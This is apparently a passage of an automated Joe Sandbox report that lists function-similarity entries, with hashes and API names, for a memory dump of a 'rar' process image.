                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Security$File$DescriptorLength
                                                                                                                                                                                                                                                                    • String ID: $ACL
                                                                                                                                                                                                                                                                    • API String ID: 2361174398-1852320022
                                                                                                                                                                                                                                                                    • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                                                    • Instruction ID: 8fbe0e83e7f25670866ac4a2302a21fc00997f17a07d65b08f103ab29b6de0ff
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92318022A09A8182EA30DB11E4513F973E4FB88B80F805175EA8D93796DF3CEE49C744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                                                                                                                                                                                                                                    • String ID: CompareStringOrdinal$kernel32.dll
                                                                                                                                                                                                                                                                    • API String ID: 2522007465-2120454788
                                                                                                                                                                                                                                                                    • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                                                                    • Instruction ID: 9c2617b58e12e13b5f2b1a053284f1de47897eb367d865a127bc72e0e909368c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E217122A4C682C1F6309B55A844275A2F0FF51F80F5456BAEE5EC7698DF3CE8498304
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Time$File$swprintf$LocalSystem
                                                                                                                                                                                                                                                                    • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                                                                                                                                                                                    • API String ID: 1364621626-1794493780
                                                                                                                                                                                                                                                                    • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                                                    • Instruction ID: 72b70d4e037412d052017643963b7f6d46c85004e0e5b5ce06c76de6e326bfcc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3212476A182418EE760CF68E480AAD77F0F748B88F145176EE48D3B48DF38E8858F14
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                    • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                                                    • Instruction ID: 1b5522b9c2c5641a7361f7e83ce1666c90be378c725250d71f3fe01471386c3f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABF03C21A19B4281EE658F11F49427923A1EF88FD4F483579EA4FC76A4DE3CD9888608
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                                                                    • Instruction ID: 8755ab83801e8da7652cbaf93c6bc52042d1d7a3a3f1bd13387e241b9e96d514
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBA1E362B0878286EB708B6094403B926D1EF44FACF4567B5DE5D867E5EF7CEC488318
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                                                                    • Instruction ID: a654ed653887ea637a1b16bc87f66e6d91a605334031b1197f625e9597a51252
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9081BF22A18A5285F7309B6598806BD26E0FB44F4CF4463B5DE0ED37A1EF3CA949C718
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3659116390-0
                                                                                                                                                                                                                                                                    • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                                                                    • Instruction ID: 2d34e50d7c5476c69e443393e5c5c5b065359b7225318892d2165e05aa7e8199
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF51D472A18A5186E721CF65D4443AC3BF0FB45B98F049275DE4E87B98EF38D649C704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 643171463-0
                                                                                                                                                                                                                                                                    • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                                                                    • Instruction ID: 6d55553910dac9a62004a546490c4772f37788f8e6a8b13c8ae83025d2e1f495
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D841A762E0CA4281F9349B20A8112B962E0EF45FE4F142379EE6DA77D5DF3CAD4D8744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                                                                    • Instruction ID: 3a311cb103e401ab64b710761edbc938cffec265ac8052ffeb5d1ea88dfc1cdf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F241E421B0AA0292FA399F45A81457566D1FF04FD4F2AA675DD1DCB384EE3CE808C748
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                    • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                                                    • Instruction ID: da9aa0a2c744d7f0fd43324b847778156017a7e8d6119b8e06d07643e6ff9349
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB118622E2860205F6B43229E48637511C1FF5DBE8E1467B4E56EC76F6CFBCAC4C4508
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: wcschr$BeepMessage
                                                                                                                                                                                                                                                                    • String ID: ($[%c]%ls
                                                                                                                                                                                                                                                                    • API String ID: 1408639281-228076469
                                                                                                                                                                                                                                                                    • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                                                                    • Instruction ID: c5bfc47f390b8873700e10b7cfbbbdaadad481603600f62272a65cb3a157b9d0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7381C523A0868182EA74DF05E4412BA67F5FB88F88F541179EA4E97759DF3CED45C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
